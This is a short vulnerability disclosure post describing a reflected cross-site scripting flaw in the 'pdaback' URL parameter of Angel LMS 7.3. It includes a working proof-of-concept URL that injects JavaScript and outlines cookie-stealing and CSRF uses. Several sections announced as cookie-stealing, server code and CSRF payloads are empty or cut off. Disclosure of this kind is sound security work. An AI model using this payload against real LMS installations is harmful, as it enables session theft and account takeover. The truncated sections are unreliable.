I have discovered a security exploit in Angel LMS 7.3 "Colleges and universities worldwide choose the ANGEL LMS to deliver powerful online teaching and learning experiences. ANGEL provides the comprehensive LMS features institutions need in a simple interface that promotes adoption. A recognized innovator, you can count on ANGEL to deliver on the promise of technology to improve education:" http://en.wikipedia.org/wiki/ANGEL_Learning Here are the relevant technical details. Angel Learning Management 7.3 is vulnerable to a Cross Site Scripting exploit. This exploit allows the injection of arbitrary javascript through a URL parameter. This is a non-persistent exploit, meaning it is subject to a user controlled variable (the url parameter). This exploit can be used to steal the session data from the cookie of another user, and gain the privileges of that user. This exploit can also be used in combination with "Cross Site Request Forgery". Meaning if the session data in the cookie was made HTTPOnly (which it isn't) then the exploit could be used to undergo any action of the privileged user regardless. PROOF OF CONCEPT: https://[Angel Root]/portal/pdaview.asp?p_TS= 85546&p_id=InTouchMail&pdaback=%22%3Cbody%20onload=alert%28%22pwnt%22%29;%3E?p_TS=85546 the second part un url-encoded:
Cookie Stealing: https://[Angel Root]/portal/pdaview.asp?p_TS=85546&p_id=InTouchMail&pdaback="?p_TS=85546 (Note that the plus sign is url-encoded, or else it will not work) Server code: Image tag version with CSRF, this can be sent through the Private Message system and logs out the user who opens it: